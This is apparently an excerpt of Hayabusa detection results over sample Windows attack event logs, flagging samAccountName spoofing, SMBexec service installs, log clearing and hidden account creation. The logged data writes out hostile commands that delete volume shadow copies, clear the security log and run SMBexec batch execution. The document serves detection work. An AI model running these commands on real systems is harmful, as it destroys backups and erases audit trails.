0x738cf9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-12 17:57:52.518 +00:00,01566s-win16-ir.threebeesco.com,4769,info,,Kerberos Service Ticket Requested,User: 01566s-win16-ir@THREEBEESCO.COM | Svc: 01566S-WIN16-IR$ | IP Addr: ::ffff:172.16.66.19 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/samaccount_spoofing_CVE-2021-42287_CVE-2021-42278_DC_securitylogs.evtx +2021-12-13 08:21:30.767 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: WINDOWS\SYSTEM32\DRIVERS\ETC | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx +2021-12-13 08:21:30.767 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts:Zone.Identifier | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx +2021-12-13 08:21:30.813 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote 
System Discovery/ID5145-DNS hosts files access via network share.evtx +2021-12-13 08:21:30.829 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: WINDOWS\SYSTEM32\DRIVERS | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx +2021-12-13 08:21:30.845 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.23.9 | LID: 0x8ca6e1d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1018-Remote System Discovery/ID5145-DNS hosts files access via network share.evtx +2021-12-13 12:55:45.250 +00:00,rootdc1.offsec.lan,7045,info,Persis,Service Installed,Name: BTOBTO | Path: %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-4697-SMBexec service registration.evtx +2021-12-13 12:55:45.250 +00:00,rootdc1.offsec.lan,4697,info,Persis,Service Installed,Name: BTOBTO | Path: %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat | User: admmig | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 
0x2cff42b44,rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-4697-SMBexec service registration.evtx +2021-12-14 14:42:48.182 +00:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: hack1 | Computer: attacker | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:48.182 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: attacker | IP Addr: 10.23.123.11 | LID: 0x308fabb0c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:48.182 +00:00,rootdc1.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:48.690 +00:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: hack1 | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:48.690 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.123.11 | LID: 0x308fb82ad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 
+2021-12-14 14:42:48.693 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: hack1 | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x308fb82ad,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:48.696 +00:00,rootdc1.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:48.908 +00:00,rootdc1.offsec.lan,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:48.908 +00:00,rootdc1.offsec.lan,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4781-Computer account renamed without a trailing $ (CVE-2021-42278).evtx +2021-12-14 14:42:49.222 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rootdc1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.222 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rootdc1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 
2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-4769-Kerberos host ticket without a trailing $.evtx +2021-12-14 14:42:49.255 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: rootdc1@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.123.11 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.255 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: rootdc1@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.123.11 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-4769-Kerberos host ticket without a trailing $.evtx +2021-12-14 14:42:49.287 +00:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.306 +00:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.309 +00:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local 
Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.886 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmhorvath | Computer: - | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.889 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.927 +00:00,rootdc1.offsec.lan,4697,info,Persis,Service Installed,Name: BTOBTO | Path: %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat | User: admmhorvath | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x308fd3169,rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.937 +00:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat | 
Path: C:\Windows\System32\cmd.exe | PID: 0x1624 | User: ROOTDC1$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.937 +00:00,rootdc1.offsec.lan,4688,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation_builtin/proc_creation_win_redirect_to_stream.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.937 +00:00,rootdc1.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.947 +00:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat | Path: C:\Windows\System32\cmd.exe | PID: 0x1138 | User: ROOTDC1$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.951 +00:00,rootdc1.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.986 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: ROOTDC1$ | Share Name: \\*\IPC$ | Share Path: | IP Addr: 127.0.0.1 | LID: 
0x3e7,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:49.989 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x308fd50bf,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:50.007 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:50.008 +00:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:50.008 +00:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 127.0.0.1 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:50.031 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share 
Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:50.033 +00:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:50.046 +00:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-14 14:42:50.049 +00:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 10.23.123.11 | LID: 0x308fd3169,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" +2021-12-17 22:44:18.475 +00:00,FS03.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1076,technique_name=Remote Desktop Protocol | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services | Process: C:\Windows\system32\reg.exe | PID: 2848 | PGUID: 
7CF65FC7-12C2-61BD-EA04-000000001400",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0009-Collection/T1125-Video capture/ID13-RDP shadow session configuration enabled (registry).evtx +2021-12-19 14:33:08.147 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete Window backup (webadmin).evtx +2021-12-19 14:48:19.294 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (wmi).evtx +2021-12-19 14:48:21.231 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: wmic nteventlog where filename=""security"" cl | Path: C:\Windows\System32\wbem\WMIC.exe | PID: 0xff0 | User: admmig | LID: 0x542c77d",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (wmi).evtx +2021-12-19 14:51:04.020 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: wmic shadowcopy delete /nointeractive | Path: C:\Windows\System32\wbem\WMIC.exe | PID: 0x12c | User: admmig | LID: 0x542c77d,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete VSS backup (WMI).evtx +2021-12-19 14:51:04.020 +00:00,FS03.offsec.lan,4688,critical,Evas | Impact,Shadow Copies Deletion Using Operating Systems 
Utilities,,rules/sigma/process_creation_builtin/proc_creation_win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete VSS backup (WMI).evtx +2021-12-19 14:51:04.130 +00:00,FS03.offsec.lan,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete VSS backup (WMI).evtx +2021-12-19 14:51:04.130 +00:00,FS03.offsec.lan,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete VSS backup (WMI).evtx +2021-12-19 15:13:49.010 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2021-12-19 15:13:49.010 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,{$_.Delete();},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2021-12-19 15:13:49.010 +00:00,FS03.offsec.lan,4104,low,Persis,Suspicious Get-WmiObject,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_gwmi.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2021-12-19 15:13:49.010 +00:00,FS03.offsec.lan,4104,high,Impact,Delete Volume Shadow Copies via WMI with 
PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2021-12-19 15:13:49.026 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-WmiObject): ""Get-WmiObject"" ParameterBinding(Get-WmiObject): name=""Class""; value=""Win32_Shadowcopy"" CommandInvocation(ForEach-Object): ""ForEach-Object"" ParameterBinding(ForEach-Object): name=""Process""; value=""$_.Delete();""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2021-12-19 15:13:49.026 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2021-12-19 15:13:49.041 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx +2022-01-06 22:27:24.156 +00:00,win10-02.offsec.lan,4688,low,Impact,Suspicious Execution of Taskkill,,rules/sigma/process_creation_builtin/proc_creation_win_susp_taskkill.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1204-User execution/ID4688-Edge payload download via command.evtx +2022-01-07 22:05:06.936 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx +2022-01-07 22:05:07.640 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: /c whoami | Path: C:\Windows\System32\cmd.exe | PID: 0xd7c | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx +2022-01-07 22:05:07.640 +00:00,FS03.offsec.lan,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: admmig | Tgt User: test10 | IP Addr: - | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Svr: localhost,rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_SuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx +2022-01-07 22:05:07.655 +00:00,FS03.offsec.lan,4688,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_builtin/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx +2022-01-07 22:05:07.655 +00:00,FS03.offsec.lan,4688,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation_builtin/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx +2022-01-07 22:05:07.655 +00:00,FS03.offsec.lan,4688,medium,Disc,Whoami Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS 
login.evtx +2022-01-24 17:03:24.224 +00:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" +2022-01-24 17:03:25.002 +00:00,fs03vuln.offsec.lan,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: 3teamssixf$ | SID: S-1-5-21-2721507831-1374043488-2540227515-1008,rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" +2022-01-24 17:03:25.002 +00:00,fs03vuln.offsec.lan,4720,high,Evas,New or Renamed User Account with '$' in Attribute 